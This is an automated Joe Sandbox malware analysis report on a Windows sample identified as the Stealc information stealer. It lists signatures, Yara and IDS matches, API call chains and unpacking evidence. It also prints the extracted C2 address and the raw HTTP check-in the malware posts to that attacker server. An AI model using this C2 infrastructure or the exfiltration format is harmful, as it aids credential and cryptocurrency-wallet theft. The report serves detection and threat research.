Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1vYjXDbKHt.exe

Overview

General Information

Sample name:1vYjXDbKHt.exe
renamed because original name is a hash value
Original sample name:902c133812718bacf8e86a6d8bbeb22d.exe
Analysis ID:1542872
MD5:902c133812718bacf8e86a6d8bbeb22d
SHA1:23ae2fdaf0c85b08e13ef68d925997c08a19a1f9
SHA256:138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 1vYjXDbKHt.exe (PID: 5000 cmdline: "C:\Users\user\Desktop\1vYjXDbKHt.exe" MD5: 902C133812718BACF8E86A6D8BBEB22D)
    • WerFault.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 1040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2279927835.000000000084A000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1318:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2201257818.0000000002350000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.3.1vYjXDbKHt.exe.2350000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.1vYjXDbKHt.exe.2350000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.1vYjXDbKHt.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.1vYjXDbKHt.exe.b30e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.1vYjXDbKHt.exe.b30e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-26T19:08:39.202252+020020442431Malware Command and Control Activity Detected192.168.2.64971662.204.41.17780TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000000.00000003.2201257818.0000000002350000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                      Source: 1vYjXDbKHt.exeReversingLabs: Detection: 47%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: 1vYjXDbKHt.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B374A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00B374A7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B39DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00B39DC7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B39D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00B39D27
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B49107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00B49107
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_00B3CA87

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeUnpacked PE file: 0.2.1vYjXDbKHt.exe.400000.1.unpack
                      Source: 1vYjXDbKHt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B3DCE7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B3C0D7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B3E077
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B31937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B31937
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B3F917
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B44107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B44107
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B3E697
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B3EF87
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B447D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B447D7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B43B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B43B17
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B44B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B44B77

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49716 -> 62.204.41.177:80
                      Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 62.204.41.177Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 35 38 36 39 34 41 32 45 44 44 34 33 38 34 30 38 37 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="hwid"FA58694A2EDD438408725------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="build"default9_cap------BGIDBKKKKKFBGDGDHIDB--
                      Source: Joe Sandbox ViewIP Address: 62.204.41.177 62.204.41.177
                      Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                      Source: unknownDNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.177
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                      Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 62.204.41.177Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 35 38 36 39 34 41 32 45 44 44 34 33 38 34 30 38 37 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="hwid"FA58694A2EDD438408725------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="build"default9_cap------BGIDBKKKKKFBGDGDHIDB--
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2279761545.000000000083E000.00000004.00000020.00020000.00000000.sdmp, 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/8
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/CP
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php2
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php3
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php9
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpR
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpe
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpkP
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpxp
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/ows
                      Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Source: 00000000.00000002.2279927835.000000000084A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 1040
                      Source: 1vYjXDbKHt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.2279927835.000000000084A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 1vYjXDbKHt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@4/1
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\RK4F87JL.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5000
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\e8420164-87e6-4741-ade5-9799e24cb4ceJump to behavior
                      Source: 1vYjXDbKHt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 1vYjXDbKHt.exeReversingLabs: Detection: 47%
                      Source: unknownProcess created: C:\Users\user\Desktop\1vYjXDbKHt.exe "C:\Users\user\Desktop\1vYjXDbKHt.exe"
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 1040
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeUnpacked PE file: 0.2.1vYjXDbKHt.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeUnpacked PE file: 0.2.1vYjXDbKHt.exe.400000.1.unpack
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0084F923 push eax; ret 0_2_0084F941
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0084F932 push eax; ret 0_2_0084F941
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0084C953 push 7DD07DC0h; iretd 0_2_0084C964
